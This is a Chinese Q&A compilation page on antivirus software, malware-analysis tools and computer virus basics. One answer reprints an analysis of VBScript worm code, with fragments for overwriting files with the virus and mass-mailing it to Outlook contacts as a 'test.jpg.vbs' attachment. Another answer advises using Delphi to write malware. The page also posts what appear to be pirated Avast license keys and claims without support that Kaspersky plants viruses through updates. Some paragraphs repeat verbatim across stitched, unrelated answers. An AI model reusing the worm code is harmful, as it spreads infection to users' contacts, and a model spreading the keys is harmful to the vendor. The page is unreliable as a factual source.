汇编语言分析恶意病毒有哪些软件

‘壹’ 各种杀毒软件的性能介绍~~~~

首先，我感觉最好的是ESETNOD32：

ESETNOD32防病毒软件是一款拥有16年历史的防病毒产品，在国际网络安全行业享有极高的声誉。它采用独有的高级启发式引擎，对广告软件、RootKit、间谍软件、木马、病毒、蠕虫等恶意软件具有极高的侦测率，能够为您的数据安全，个人隐私等提供有效的防护，360安全中心独家提供ESETNOD32防病毒360专用版半年免费激活码。ESETNOD32防病毒软件概述

为了保证重要信息的安全，在平静中呈现极佳的性能。不需要那些庞大的互联网安全套装，ESETNOD32就可针对肆虐的病毒威胁为您提供快速而全面的保护。它极易使用，您所要做的只是：设置它，并忘记它！

全面的保护

单独地运行病毒、黑客软件、广告插件和间谍软件的防护程序会拖慢您的计算机，并难于进行管理，必将带来安全问题。小心那些臃肿的互联网安全套装，它会占用您计算机数百兆的空间。它们的存在是因为商家把现有的产品捆绑在一起。相反，ESETNOD32则设计了一个高效的内核，作为一个单独的、高度优化的引擎，提供统一的安全保护，防止不断的更新病毒、蠕虫、间谍程序的恶意攻击。ESETNOD32拥有先进的ThreatSense®技术（专利申请中），可通过对恶意代码进行分析，实时侦测未知的病毒，让您时刻走在病毒编写者的前面。

最小的影响

ESETNOD32节约内存和硬盘上的资源，让它们为更重要的应用服务，本软件只有11M，平均占用23M的内存(根据检测状态会有变化)。Threatsense®每次更新（包括启发式逻辑和病毒特征码）通常都只有20KB到50KB左右。选择ESETNOD32将更加有效。

最快的扫描

强大的安全防护绝不拖慢计算机。ESETNOD32是用大量的汇编语言编写而成，因其最快的侦测速度和高效的查杀能力而连续地获奖，平均比其竞争对手快3到34倍（源自:VirusBulletin)。选择ESETNOD32可提升您的计算机性能。

简单的管理

ESETNOD32会自动进行自我更新，如果您是个人使用或是家庭办公的话，您根本不用去管理它。对于大型企业，我们提供了强大的远程分布式的网络管理，管理员可以集中部署、安装、监测和管理成千上万的ESETNOD32工作站和服务器。最小影响和最快的速度可以得到的最好的保护。ESETNOD32能够多层次地保护你的组织，在桌面、文件服务器和邮件网关。都能为您提供最佳的解决方案。

启发式实时侦测

启发式是最有效的安全保护，病毒程序的防护必须要在其对计算机造成影响前实时地进行。那些时刻等待着病毒特征库更新的防毒软件会给攻击打开一扇窗，稍不留神就有可能给您造成灾难性的后果。ESETNOD32则凭借其ThreatSense®技术，将会关闭这扇窗，而不像大部分依靠特征库更新的防毒软件。

ESETNOD32通过实时分析应用软件的执行过程来判断是否存在恶意企图，可以提前地侦测并拦截病毒威胁。而且，在大多数情况下不需要进行病毒特征更新。与此相反，多数的其它杀毒软件只会在他们的用户受到新病毒攻击后的几个小时发布病毒特征。

对多种威胁的保护措施由下列模件提供：

文件实时监控(AMON)常驻内存的扫描器，它会自动的扫描计算机将要访问的文件。

ESETNOD32手动扫描器（按用户要求进行扫描）,可选择要扫描的文件和磁盘分区。也可以计划在某个空闲时间自动扫描。

网络监视（IMON）常驻于内存，在Winsock级来防止恶意代码入侵电脑，它会扫描互联网浏览网页(HTTP)、以及POP3电子邮件协议。

MSOffice文件实时防护（DMON）通过监视微软提供的API，在打开office文件时首先检测文件是否被感染(包括在IE上打开office文件)。

MSOutlook电子邮件保护（EMON）一个辅助的模块，通过MAPI接口与电子邮件客户端软件协同工作，比如MicrosoftOutlook、MicrosoftExchange。

其次我觉得是BitDefender（就是内存占的太大，电脑性能不好的不要用啊）：

产品名称：bitdefender互联网安全套装2008

产品介绍：

这是罗马尼亚出品的一款杀毒软件，它将为你的计算机提供最大的保护，具有功能强大的反病毒引擎以及互联网过滤技术，为你提供即时信息保护功能。它包括：

1：永久的防病毒保护；

2：后台扫描与网络防火墙；

3：保密控制；

4：自动快速升级模块；

5：创建计划任务；

6：病毒隔离区。

BitDefender简介：

BitDefender安全方案套件为各种规模的企业和个人用户提供领先的信息安全保护。凭借防病毒，防间谍软件，防垃圾邮件，防火墙，网络内容过滤等多种安全管理工具。BitDefender为运行在Windows/Linux/FreeBSD等平台下的桌面计算机，网关，Internet服务器，邮件和文件服务器等网络环境中的一切安全薄弱环节提供全面的防护。

BitDefender技术优势：

BitDefender的安全保护技术被所有主要独立评测机构-如ICSA实验室和英国西海岸实验室-所承认，其技术优势主要表现在：虚拟环境中行为启发式分析：(B-HAVE，)-在计算机内生成虚拟环境，模拟软件运行并识别是否存在恶意插件，将病毒与您的操作系统完全隔离。新病毒的快速响应：BitDefender以小于4小时的新病毒响应时间在众多防病毒软件中独占鳌头。

还有就是360杀毒啦，不过因为它是免费的（记住！是免费的哦！）好像侵害了中国某些杀毒软件的权益，被很多负面报道说成是骗人的，我用过，很好用，缺点是太容易被攻击，而且站得村也很大：

360杀毒是由360安全中心联合世界着名的安全公司BitDefender推出的一款面向中国用户的杀毒软件。结合360安全卫士对中国互联网安全领域的深入了解，以及BitDefender享誉全球的病毒查杀技术，360杀毒为中国用户提供了又一个优秀的安全产品。秉承360安全中心“为中国用户打造放心安全的上网环境”的愿景，360杀毒和其他360系列产品一样，是完全免费的软件产品。

卡巴斯基也不错，不过就是挺黑的：他中会在你激活码快到期时利用更新向电脑中下载病毒！逼迫你继续用他们的产品：

基本保护

防御所有类型恶意程序和间谍软件

扫描文件，邮件信息和互联网流量

保护即时消息程序(MSN,ICQ)

自动更新

扩展保护

双向个人防火墙

保护无线上网和VPN连接。新增!

入侵防御系统

前摄保护

应用程序智能管理控制。新增!

主动防御未知威胁

扫描操作系统和已安装程序中的漏洞。新增!

禁用恶意网站的链接。新增!

保护个人信息

禁用钓鱼网站链接

虚拟键盘用来保护您登录信息和输入密码的安全。新增!

防止通过安全连接(HTTPS/SSL)来窃取交换的数据。新增!

阻止未授权的拨号连接

保护个人信息

家长控制

反垃圾邮件保护

我觉得好的就这些，力挺第一种！占内存很小！你问到是买正版还是下载，我觉得从官网下载更好！

‘贰’ 能查出电脑里所有恶意软件,插件,木马,病毒等最好的软件是什么

360安全卫士，金山卫士，windows清理助手

‘叁’ [250分的问题]关于病毒样本和病毒分析和病毒分析工具、方法

1病毒样本要从哪里来
就病毒代码的存在形式来说，有两种，一种是病毒自身是个独立的程序文件，另一种是它附着在正常的程序文件上，即所谓的感染，所以，病毒样本其实就是指怀疑为病毒或染毒的文件
不过实际上，病毒程序并不一定象你说的那样清清楚楚的有个主程序，现在的病毒木马，都是几个程序文件组成，相互保护、相互调用运行，它们都是病毒样本
病毒的发作状态，有些是能察觉出来的，比如：增加了进程、电脑速度或网速变慢、系统运行报错等等，有些病毒发作时，几乎没有外在表现，很隐蔽
病毒其实就是一段程序，一是一，二是二，一点也不可怕和神秘，只要不运行它，它就是死的，非常安全，如果你怕在提取过程中误运行了病毒，可以把病毒程序文件的扩展名改一下，改为不可被执行或被直接打开的扩展名即可，或根本就不要扩展名，这样在拷贝、传输过程中就非常安全了

2要怎么分析
（1）http://www.qiker.com/jiaocheng/hei6/%B2%A1%B6%BE%D0%C5%CF%A2/vir00041.htm（病毒分析祥解）
（2）一、Vbs脚本病毒的特点及发展现状
VBS病毒是用VB Script编写而成，该脚本语言功能非常强大，它们利用Windows系统的开放性特点，通过调用一些现成的Windows对象、组件，可以直接对文件系统、注册表等进行控制，功能非常强大。应该说病毒就是一种思想，但是这种思想在用VBS实现时变得极其容易。VBS脚本病毒具有如下几个特点：
1．编写简单，一个以前对病毒一无所知的病毒爱好者可以在很短的时间里编出一个新型病毒来。
2．破坏力大。其破坏力不仅表现在对用户系统文件及性能的破坏。他还可以使邮件服务器崩溃，网络发生严重阻塞。
3．感染力强。由于脚本是直接解释执行，并且它不需要像PE病毒那样，需要做复杂的PE文件格式处理，因此这类病毒可以直接通过自我复制的方式感染其他同类文件，并且自我的异常处理变得非常容易。
4．传播范围大。这类病毒通过htm文档，Email附件或其它方式，可以在很短时间内传遍世界各地。
5．病毒源码容易被获取，变种多。由于VBS病毒解释执行，其源代码可读性非常强，即使病毒源码经过加密处理后，其源代码的获取还是比较简单。因此，这类病毒变种比较多，稍微改变一下病毒的结构，或者修改一下特征值，很多杀毒软件可能就无能为力。
6．欺骗性强。脚本病毒为了得到运行机会，往往会采用各种让用户不大注意的手段，譬如，邮件的附件名采用双后缀，如.jpg.vbs，由于系统默认不显示后缀，这样，用户看到这个文件的时候，就会认为它是一个jpg图片文件。
7．使得病毒生产机实现起来非常容易。所谓病毒生产机，就是可以按照用户的意愿，生产病毒的机器（当然，这里指的是程序），目前的病毒生产机，之所以大多数都为脚本病毒生产机，其中最重要的一点还是因为脚本是解释执行的，实现起来非常容易，具体将在我们后面谈及。
正因为以上几个特点，脚本病毒发展异常迅猛，特别是病毒生产机的出现，使得生成新型脚本病毒变得非常容易。

二、Vbs脚本病毒原理分析
1．vbs脚本病毒如何感染、搜索文件
VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间，譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部，并在顶部加入一条调用病毒代码的语句，而爱虫病毒则是直接生成一个文件的副本，将病毒代码拷入其中，并以原文件名作为病毒文件名的前缀，vbs作为后缀。下面我们通过爱虫病毒的部分代码具体分析一下这类病毒的感染和搜索原理：
以下是文件感染的部分关键代码：
Set fso=createobject("scripting.filesystemobject") '创建一个文件系统对象
set self=fso.opentextfile(wscript.scriptfullname,1) '读打开当前文件（即病毒本身）
vbs=self.readall ' 读取病毒全部代码到字符串变量vbs……
set ap=fso.opentextfile(目标文件.path,2,true) ' 写打开目标文件，准备写入病毒代码
ap.write vbs ' 将病毒代码覆盖目标文件
ap.close
set cop=fso.getfile(目标文件.path) '得到目标文件路径
cop.(目标文件.path & ".vbs") ' 创建另外一个病毒文件（以.vbs为后缀）
目标文件.delete(true) '删除目标文件
上面描述了病毒文件是如何感染正常文件的：首先将病毒自身代码赋给字符串变量vbs，然后将这个字符串覆盖写到目标文件，并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本，最后删除目标文件。
下面我们具体分析一下文件搜索代码：
'该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本
sub scan(folder_) 'scan函数定义，
on error resume next '如果出现错误，直接跳过，防止弹出错误窗口
set folder_=fso.getfolder(folder_)
set files=folder_.files ' 当前目录的所有文件集合
for each file in filesext=fso.GetExtensionName(file) '获取文件后缀
ext=lcase(ext) '后缀名转换成小写字母
if ext="mp5" then '如果后缀名是mp5，则进行感染。请自己建立相应后缀名的文件，最好是非正常后缀名 ，以免破坏正常程序。
Wscript.echo (file)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders '搜索其他目录；递归调用
scan( )
scan(subfolder)
next
end sub
上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍，非常巧妙，采用了一个递归的算法遍历整个分区的目录和文件。

2．vbs脚本病毒通过网络传播的几种方式及代码分析
VBS脚本病毒之所以传播范围广，主要依赖于它的网络传播功能，一般来说，VBS脚本病毒采用如下几种方式进行传播：
1）通过Email附件传播
这是一种用的非常普遍的传播方式，病毒可以通过各种方法拿到合法的Email地址，最常见的就是直接取outlook地址簿中的邮件地址，也可以通过程序在用户文档（譬如htm文件）中搜索Email地址。
下面我们具体分析一下VBS脚本病毒是如何做到这一点的：
Function mailBroadcast()
on error resume next
wscript.echo
Set outlookApp = CreateObject("Outlook.Application") //创建一个OUTLOOK应用的对象
If outlookApp= "Outlook" Then
Set mapiObj=outlookApp.GetNameSpace("MAPI") //获取MAPI的名字空间
Set addrList= mapiObj.AddressLists //获取地址表的个数
For Each addr In addrList
If addr.AddressEntries.Count <> 0 Then
addrEntCount = addr.AddressEntries.Count //获取每个地址表的Email记录数
For addrEntIndex= 1 To addrEntCount //遍历地址表的Email地址
Set item = outlookApp.CreateItem(0) //获取一个邮件对象实例
Set addrEnt = addr.AddressEntries(addrEntIndex) //获取具体Email地址
item.To = addrEnt.Address //填入收信人地址 item.Subject = "病毒传播实验" //写入邮件标题
item.Body = "这里是病毒邮件传播测试，收到此信请不要慌张！" //写入文件内容
Set attachMents=item.Attachments //定义邮件附件
attachMents.Add fileSysObj.GetSpecialFolder(0) & "\test.jpg.vbs"
item.DeleteAfterSubmit = True //信件提交后自动删除
If item.To <> "" Then
item.Send //发送邮件
shellObj.regwrite "HKCU\software\Mailtest\mailed", "1" //病毒标记，以免重复感染
End If
Next
End If
Next
End if
End Function

太多了~你能不能自己去看？网络发不来~还有250分
http://topic.csdn.net/t/20040717/09/3183195.html

‘肆’ 编写计算机病毒一般用的是什么软件呀，是我们常用的VB，C++之类的编程软件吗

不是，Turbo C,还有就是Delphi的开发工具，Delphi是一种很好的恶意软件开发语言，建议你用用

‘伍’ 编病毒的软件

不能用vb编病毒。vb不是真正的编译性语言。有时要用到系统里没有的vb库dll.一个dll就很大。病毒带个这么大的dll。体积就大了。容易被中毒的人查出来，而且传播的速度也慢。（毕竟文件大）。
一般病毒是用delphi(灰鸽子，熊猫烧香都用它）或c++(vc++）来写的，当然也可以用汇编（那是强人的做法），bat一般不叫病毒了。虽然有时候批处理也能做出有破坏性的东西。但是毕竟不是真正的程序

‘陆’ 病毒都是用什么软件来编写的

汇编，C, delphi 任何语言都可以写病毒。

不同病毒原理不同。。。。

‘柒’ 如何检测恶意软件

作为一名安全工作者在日常工作中难免会用到这些恶意软件检测平台，例如：渗透测试中给木马做免杀处理后检查其免杀效果，又或者在捕获到某恶意病毒/木马样本时进行简单的检测、分析等。

当然，使用这些平台较多的主要还是普通网民和像我这样的ScriptKid，对于真正的样本分析大佬来说也只是用于辅助，大多数还是会经过人工分析，因为只有这样才能更加了解恶意软件样本的行为。
您好，恶意软件可以盗取您的用户隐私、消耗您的手机流量、暗扣您的手机费用，如发现建议您尽快处理。您可以使用腾讯手机管家进行清除。管家可以帮您检测到软件的恶意行为，并引导您进行一次性阻止或卸载。操作方式如下：
首先，建议您将手机获取ROOT权限，root后可实现保留软件功能，阻止恶意行为的目的；同时也可确保手机能够彻底卸载恶意软件。
通常情况下，欺骗某人为您做事要比编写软件是人在不知情的情况下做事容易。因此，在 IT 行业可以看到大量的恶作剧。
与其他形式的恶意软件一样，恶作剧也使用社会工程来试图欺骗计算机用户执行某些操作。但是，在恶作剧中并不执行任何代码；恶作剧者通常只尝试欺骗受害者。至今恶作剧已经采用了多种形式。但特别常见的一个示例为，某个电子邮件声称发现了一种新的病毒类型，并要您通过转发此邮件来通知您的朋友。这些恶作剧会浪费人们的时间，消耗电子邮件资源并占用网络带宽。
通常情况下，欺骗某人为您做事要比编写软件是人在不知情的情况下做事容易。因此，在 IT 行业可以看到大量的恶作剧。
与其他形式的恶意软件一样，恶作剧也使用社会工程来试图欺骗计算机用户执行某些操作。但是，在恶作剧中并不执行任何代码；恶作剧者通常只尝试欺骗受害者。至今恶作剧已经采用了多种形式。但特别常见的一个示例为，某个电子邮件声称发现了一种新的病毒类型，并要您通过转发此邮件来通知您的朋友。这些恶作剧会浪费人们的时间，消耗电子邮件资源并占用网络带宽。
垃圾邮件是未经请求的电子邮件，用于为某些服务或产品做广告。它通常被认做是讨厌的东西，但是垃圾邮件不是恶意软件。但是，所发送的垃圾邮件数量的飞速增长已经成为 Internet 基础结构的一个问题，这可导致员工工作效率的降低，因为他们每天必须费力查看并删除此类邮件。
术语"垃圾邮件"的来源尚在讨论之中，但是无论它的来源是什么，有一点是可以肯定的，那就是垃圾邮件已经成为 Internet 通信中最让人头痛的、长久存在的问题之一。许多人认为垃圾邮件问题如此严重，以至于它现在威胁到了世界各地的电子邮件通信的健康状况。但是，我们应该注意到，除了电子邮件服务器和防垃圾邮件软件所承担的负载之外，垃圾邮件实际上并不能复制或威胁某个组织 IT 系统的健康和运作。
垃圾邮件是未经请求的电子邮件，用于为某些服务或产品做广告。它通常被认做是讨厌的东西，但是垃圾邮件不是恶意软件。但是，所发送的垃圾邮件数量的飞速增长已经成为 Internet 基础结构的一个问题，这可导致员工工作效率的降低，因为他们每天必须费力查看并删除此类邮件。
术语"垃圾邮件"的来源尚在讨论之中，但是无论它的来源是什么，有一点是可以肯定的，那就是垃圾邮件已经成为 Internet 通信中最让人头痛的、长久存在的问题之一。许多人认为垃圾邮件问题如此严重，以至于它现在威胁到了世界各地的电子邮件通信的健康状况。但是，我们应该注意到，除了电子邮件服务器和防垃圾邮件软件所承担的负载之外，垃圾邮件实际上并不能复制或威胁某个组织 IT 系统的健康和运作。
广告软件通常与宿主应用程序组合在一起，只要用户同意接受广告软件即可免费提供宿主应用程序。因为广告软件应用程序通常在用户接受说明应用程序用途的许可协议之后进行安装，因而不会给用户带来任何不快。但是，弹出式广告会非常令人讨厌，并且在某些情况下会降低系统性能。此外，有些用户原来并没有完全意识到许可协议中的条款，这些应用程序收集的信息可能会导致他们担心隐私问题。
注意： 尽管术语"间谍软件"和"广告软件"经常交替使用，但只有未经授权的广告软件才等同于间谍软件。为用户提供适当的通知、选择和控制的广告软件并不是欺骗性的，不应划分为间谍软件。还要注意到，声称执行特定功能（实际上执行其他任务）的间谍软件应用程序实际上起到了特洛伊木马的作用。

‘捌’ 哪有反病毒的好软件急！！！！！那位高手给个网站！拜托。

现在网上最火的杀软AVAST中文版
在欧洲被称为唯一能与NOD32媲美的杀软

AVAST v4.7 Professional官方中文版

http://down8.4.52z.com:80/soft/setupchspro4.7.rar
序列号
S6039686R6039W1106-FBYVE2MU
有效期2009.5.6
升级有效期2010.1.1

S7935192R4371Z1106-S1BJD5AJ
有效期2012.1.6
升级有效期2008.8.1

S6945137R6826L1106-WXH4K1SJ
有效期2008.4.6
升级有效期2010.9.1

皮肤下载

http://www.avast.com/eng/skins.html

来自捷克的AVAST，已有17年的历史，但最近才在我们这里兴起，它在国外市场一直处于领先地位。Avast！的实时监控功能十分强大！它拥有七大防护模块：网络防火墙防护、标准的本地文件读取防护、网页防护、即时通讯软件防护、邮件收发防护、P2P软件防护。这么完善的防护系统，定能让你的系统练就一副金刚不坏之身！任意开启各项保护模块能够查杀流氓软件,比如3721。升级很人性化Avast是捷克一家软件公司(ALWIL Software)的产品。ALWIL 软件公司的研发机构在捷克的首都－布拉格，现在他们和世界上许多国家的安全软件机构都有良好的合作关系。早在80年代末ALWIL公司的安全软件已经获得良好的市场占有率，但当时仅限于捷克地区。ALMIL公司是擅长于安全软件方面的研发，开发的Avast Antivirus系列是他们的拳头产品，Avast在许多重要的市场和权威评奖中都取得了骄人的成绩，同样在此后进军国际市场上也赢得了良好的增长率。
主要特点：
（1）高侦测的反病毒表现，多次获得过ICSA和VirusBulletin 100%认证，启发式强大。
（2）较低的内存占用和直观，简洁的使用界面。
（3）支持SKIN更换，完善的程序内存检测
（4）对SMTP/POP3/IMAP邮件收发监控的全面保护。
（5）支持MS OUTLOOK外挂，智能型邮件帐号分析。
（6）支持宏病毒文档修复，修复档案后自动产生病毒还原数据库（VRDB功能）。
（7）支持P2P共享下载软件和即时通讯病毒检测，保护全面。
（8）良好有效的侦测并清除病毒，如虫，广告和木马程序
（9）病毒库更新速度快，对新型病毒和木马有迅捷的反应。
功能特性如下：
＊反病毒内核
＊自动升级
＊简单的使用界面
＊病毒隔离区
＊实时监控
＊系统结合
＊P2P和聊天软件监控保护
＊病毒清除
＊网络防护
＊64位系统支持
＊网页防护
＊多国语言支持
＊增强型用户界面
＊恶意脚本屏蔽 ＊DOS下扫描
＊扩展病毒库升级 ＊移除病毒备份
占用内存不到25兆,让你老机器也流畅

‘玖’ 病毒分析师都用的什么软件分析病毒啊 要具体的 别又啥虚拟机啥的糊弄人 禁止

VMWARE 吧，至少我自己以前就是用这个来分析。(但是我自己不是病毒分析师，顺便做下而已)

因为分析病毒需要尽可能隔离的系统，Vpc这种有大量“整合”的显然不适合。
比如要分析网络访问，就可以直接抓本地虚拟网卡的包，因为本地虚拟网卡和虚拟机是相通的。而且vmware的虚拟机做的也比vmlite|virtualbox好。

至于具体用哪个完全可以看你自己爱好了，因为对于guest系统来说并没有太多区别。

另外一个需要注意的是，vmdk的支持较为广泛，winmount等都可以挂载，可以复制出一个磁盘文件来尝试直接利用host上的程序进行杀除。

我想，最后的考虑就是你在不在乎使用盗版软件了 :)

=====================================
好吧，我看错题目了。我自己补充下我的经验好了：

网络抓包：wireshark
进程查询：processxp
进程监控：processmon
主要就这三个。
其他的根据需要比如md5校检之类。

作为业余人士，我使用这些软件……很方便

你可以这样：一个原始的未被感染文件，一个被感染的文件，然后winhex之类的比较。
根深层次的分析要用debug模式分析，我只在cheatengine上改过汇编的代码，所以我不会，所以我才用processmon这样的软件啊……
====================================

‘拾’ 计算机病毒的概念特征分类,病毒的例子,用什么软件

病毒的定义

20世纪60年代初，美国贝尔实验室的三位程序员编写了一个名为“磁芯大战”的游戏，游戏中通过复制自身来摆脱对方的控制，这就是所谓“病毒”的第一个雏形。

20世纪70年代，美国作家雷恩在其出版的《P1的青春》一书中构思了一种能够自我复制的计算机程序，并第一次称之为“计算机病毒”。

1983年11月，在国际计算机安全学术研讨会上，美国计算机专家首次将病毒程序在VAX/750计算机上进行了实验，世界上第一个计算机病毒就这样出生在实验室中。

20世纪80年代后期，巴基斯坦有两个以编程为生的兄弟，他们为了打击那些盗版软件的使用者，设计出了一个名为“巴基斯坦智囊”的病毒，这就是世界上流行的第一个真正的病毒。

那么，究竟什么是计算机病毒呢？

1994年2月18日，我国正式颁布实施了《中华人民共和国计算机信息系统安全保护条例》（参见附录一）。在该条例的第二十八条中明确指出：“计算机病毒，是指编制或者在计算机程序中插入的破坏计算机功能或者毁坏数据，影响计算机使用，并能自我复制的一组计算机指令或者程序代码。”

这个定义具有法律性、权威性。根据这个定义，计算机病毒是一种计算机程序，它不仅能破坏计算机系统，而且还能够传染到其他系统。计算机病毒通常隐藏在其他正常程序中，能生成自身的拷贝并将其插入其他的程序中，对计算机系统进行恶意的破坏。

计算机病毒不是天然存在的，是某些人利用计算机软、硬件所固有的脆弱性，编制的具有破坏功能的程序。计算机病毒能通过某种途径潜伏在计算机存储介质（或程序）里，当达到某种条件时即被激活，它用修改其他程序的方法将自己的精确拷贝或者可能演化的形式放入其他程序中，从而感染它们，对计算机资源进行破坏的这样一组程序或指令集合。
病毒的特征

传统意义上的计算机病毒一般具有以下几个特点：

1、破坏性

任何病毒只要侵入系统，都会对系统及应用程序产生不同程度的影响，凡是由软件手段能触及到计算机资源的地方均可能受到计算机病毒的破坏。轻者会降低计算机工作效率，占用系统资源，重者可导致系统崩溃。

根据病毒对计算机系统造成破坏的程度，我们可以把病毒分为良性病毒与恶性病毒。良性病毒可能只是干扰显示屏幕，显示一些乱码或无聊的语句，或者根本没有任何破坏动作，只是占用系统资源。这类病毒较多，如：GENP、小球、W-BOOT等。恶性病毒则有明确的目的，它们破坏数据、删除文件、加密磁盘或者甚至格式化磁盘，有的恶性病毒对数据造成不可挽回的破坏。这类病毒有CIH、红色代码等。

2、隐蔽性

病毒程序大多夹在正常程序之中，很难被发现，它们通常附在正常程序中或磁盘较隐蔽的地方（也有个别的以隐含文件形式出现），这样做的目的是不让用户发现它的存在。如果不经过代码分析，我们很难区别病毒程序与正常程序。一般在没有防护措施的情况下，计算机病毒程序取得系统控制权后，可以在很短的时间里传染大量程序。而且受到传染后，计算机系统通常仍能正常运行，使用户不会感到有任何异常。

大部分病毒程序具有很高的程序设计技巧、代码短小精悍，其目的就是为了隐蔽。病毒程序一般只有几百字节，而PC机对文件的存取速度可达每秒几百KB以上，所以病毒程序在转瞬之间便可将这短短的几百字节附着到正常程序之中，非常不易被察觉。

3、潜伏性

大部分计算机病毒感染系统之后不会马上发作，可长期隐藏在系统中，只有在满足特定条件时才启动其破坏模块。例如，PETER-2病毒在每年的2月27日会提三个问题，答错后会将硬盘加密。着名的“黑色星期五”病毒在逢13号的星期五发作。当然，最令人难忘的是26日发作的CIH病毒。这些病毒在平时会隐藏得很好，只有在发作日才会显露出其破坏的本性。

4、传染性

计算机病毒的传染性是指病毒具有把自身复制到其他程序中的特性。计算机病毒是一段人为编制的计算机程序代码，这段程序代码一旦进入计算机并得以执行，它会搜寻其他符合其传染条件的程序或存储介质，确定目标后再将自身代码插入其中，达到自我繁殖的目的。只要一台计算机染毒，如不及时处理，那么病毒会在这台计算机上迅速扩散，其中的大量文件（一般是可执行文件）会被感染。而被感染的文件又成了新的传染源，再与其他机器进数据交换或通过网络接触，病毒会在整个网络中继续传染。

正常的计算机程序一般是不会将自身的代码强行连接到其他程序之上的。而病毒却能使自身的代码强行传染到一切符合其传染条件的未受到传染的程序之上。是否具有传染性是判别一个程序是否为计算机病毒的最重要条件。

随着计算机软件和网络技术的发展，在今天的网络时代，计算机病毒又有了很多新的特点：

1、主动通过网络和邮件系统传播

从当前流行的前十位计算机病毒来看，其中七个病毒都可以利用邮件系统和网络进行传播。例如，“求职信”病毒就是通过电子邮件传播的，这种病毒程序代码往往夹在邮件的附件中，当收邮件者点击附件时，病毒程序便得以执行并迅速传染。它们还能搜索计算机用户的邮件通讯地址，继续向网络进行传播。

2、传播速度极快

由于病毒主要通过网络传播，因此，一种新病毒出现后，可以迅速通过国际互联网传播到世界各地。例如，“爱虫”病毒在一、两天内迅速传播到世界的主要计算机网络，并造成欧、美国家的计算机网络瘫痪。

3、变种多

现在，很多新病毒都不再使用汇编语言编写，而是使用高级程序设计语言。例如，“爱虫”是脚本语言病毒，“美丽杀”是宏病毒。它们容易编写，并且很容易被修改，生成很多病毒变种。“爱虫”病毒在十几天中，就出现了三十多个变种。“美丽杀”病毒也生成了三、四个变种，并且此后很多宏病毒都是使用了“美丽杀”的传染机理。这些变种的主要传染和破坏的机理与母本病毒一致，只是某些代码作了修改。

4、具有病毒、蠕虫和黑客程序的功能

随着网络技术的普及和发展，计算机病毒的编制技术也在不断地提高。过去，病毒最大的特点是能够复制自身给其他的程序。现在，计算机病毒具有了蠕虫的特点，可以利用网络进行传播。同时，有些病毒还具有了黑客程序的功能，一旦侵入计算机系统后，病毒控制者可以从入侵的系统中窃取信息，远程控制这些系统。呈现出计算机病毒功能的多样化，因而，更具有危害性。

病毒的分类

通常，计算机病毒可分为下列几类：

1、文件型病毒

文件型病毒通过在执行过程中插入指令，把自己依附在可执行文件上。然后，利用这些指令来调用附在文件中某处的病毒代码。当文件执行时，病毒会调出自己的代码来执行，接着又返回到正常的执行指令序列。通常，这个执行过程发生得很快，以致于用户并不知道病毒代码已被执行。

2、引导扇区病毒

引导扇区病毒改变每一个用DOS格式来格式化的磁盘的第一个扇区里的程序。通常引导扇区病毒先执行自身的代码，然后再继续PC机的启动进程。大多数情况，在一台染有引导型病毒的计算机上对可读写的软盘进行读写操作时，这块软盘也会被感染该病毒。引导扇区病毒会潜伏在软盘的引导扇区里，或者在硬盘的引导扇区或主引导记录中插入指令。此时，如果计算机从被感染的软盘引导时，病毒就会感染到引导硬盘，并把自己的代码调入内存。触发引导区病毒的典型事件是系统日期和时间。

3、混合型病毒

混合型病毒有文件型和引导扇区型两类病毒的某些共同特性。当执行一个被感染的文件时，它将感染硬盘的引导扇区或主引导记录，并且感染在机器上使用过的软盘。这种病毒能感染可执行文件，从而能在网上迅速传播蔓延。

4、变形病毒

变形病毒随着每次复制而发生变化，通过在可能被感染的文件中搜索简单的、专门的字节序列，是不能检测到这种病毒的。变形病毒是一种能变异的病毒，随着感染时间的不同而改变其不同的形式，不同的感染操作会使病毒在文件中以不同的方式出现，使传统的模式匹配法杀毒软件对这种病毒显得软弱无力。

5、宏病毒

宏病毒不只是感染可执行文件，它可以感染一般软件文件。虽然宏病毒不会对计算机系统造成严重的危害，但它仍令人讨厌。因为宏病毒会影响系统的性能以及用户的工作效率。宏病毒是利用宏语言编写的，不受操作平台的约束，可以在D0S、Windows、Unix甚至在OS／2系统中散播。这就是说，宏病毒能被传播到任何可运行编写宏病毒的应用程序的机器中。
计算机病毒的发展趋势

随着Internet的发展和计算机网络的日益普及，计算机病毒出现了一系列新的发展趋势。

1、无国界

新病毒层出不穷，电子邮件已成为病毒传播的主要途径。病毒家族的种类越来越多，且传播速度大大加快，传播空间大大延伸，呈现无国界的趋势。

据统计，以前通过磁盘等有形媒介传播的病毒，从国外发现到国内流行，传播周期平均需要6－12个月，而Internet的普及，使得病毒的传播已经没有国界。从“美丽杀”、“怕怕”、“辛迪加”、“欢乐99”、到“美丽公园”、“探索蠕虫”、“红色代码”、“求职信”等恶性病毒，通过Internet在短短几天就传遍整个世界。

2、多样化

随着计算机技术的发展和软件的多样性，病毒的种类也呈现多样化发展的态势，病毒不仅仅有引导型病毒、普通可执行文件型病毒、宏病毒、混合型病毒，还出现专门感染特定文件的高级病毒。特别是Java、VB和ActiveX的网页技术逐渐被广泛使用后，一些人就利用技术来撰写病毒。以Java病毒为例，虽然它并不能破坏硬盘上的资料，但如果使用浏览器来浏览含有Java病毒的网页，浏览器就把这些程序抓下来，然后用使用者自己系统里的资源去执行，因而，使用者就在神不知鬼不觉的状态下，被病毒进入自己的机器进行复制并通过网络窃取宝贵的个人秘密信息。

3、破坏性更强

新病毒的破坏力更强，手段比过去更加狠毒和阴险，它可以修改文件（包括注册表）、通讯端口，修改用户密码，挤占内存，还可以利用恶意程序实现远程控制等。例如，CIH病毒破坏主板上的BIOS和硬盘数据，使得用户需要更换主板，由于硬盘数据的不可恢复性丢失，给全世界用户带来巨大损失。又如，“白雪公主”病毒修改Wsock32.Dll，截取外发的信息，自动附加在受感染的邮件上，一旦收信人执行附件程序，该病毒就会感染个人主机。一旦计算机被病毒感染，其内部的所有数据、信息以及核心机密都将在病毒制造者面前暴露，他可以随心所欲地控制所有受感染的计算机来达到自己的任何目的。

4、智能化

